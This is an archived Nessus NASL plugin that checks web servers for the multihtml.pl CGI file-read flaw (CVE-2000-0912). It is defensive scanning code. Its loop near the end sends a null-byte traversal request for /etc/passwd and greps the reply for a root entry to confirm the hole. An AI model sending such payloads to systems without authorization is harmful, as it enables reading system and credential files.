home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / multihtml.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  73 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10516);
  10.  script_bugtraq_id(6711);
  11.  script_version ("$Revision: 1.15 $");
  12.  script_cve_id("CVE-2000-0912");
  13.  name["english"] = "multihtml cgi";
  14.  name["francais"] = "cgi multihtml";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'multihtml.pl' CGI is installed. This CGI has
  18. a well known security flaw that lets an attacker read arbitrary
  19. files on the remote host.
  20.  
  21. Solution : remove 'multihtml.pl' from /cgi-bin.
  22.  
  23. Risk factor : High";
  24.  
  25.  
  26.  desc["francais"] = "Le cgi 'multihtml.pl' est installΘ. Celui-ci possΦde
  27. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de lire
  28. des fichiers arbitraires sur l'hote distant
  29.  
  30. Solution : retirez-le de /cgi-bin.
  31.  
  32. Facteur de risque : SΘrieux";
  33.  
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "Checks for the presence of /cgi-bin/multihtml.pl";
  38.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/multihtml.pl";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl");
  51.  script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58. include("http_func.inc");
  59. include("http_keepalive.inc");
  60.  
  61. port = get_http_port(default:80);
  62.  
  63. if(!get_port_state(port))exit(0);
  64.  
  65. foreach dir (cgi_dirs())
  66. {
  67.  req = string(dir, "/multihtml.pl?multi=/etc/passwd%00html");
  68.  req = http_get(item:req, port:port);
  69.  buf = http_keepalive_send_recv(port:port, data:req);
  70.  if( buf == NULL ) exit(0);
  71.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf))security_hole(port);
  72. }
  73.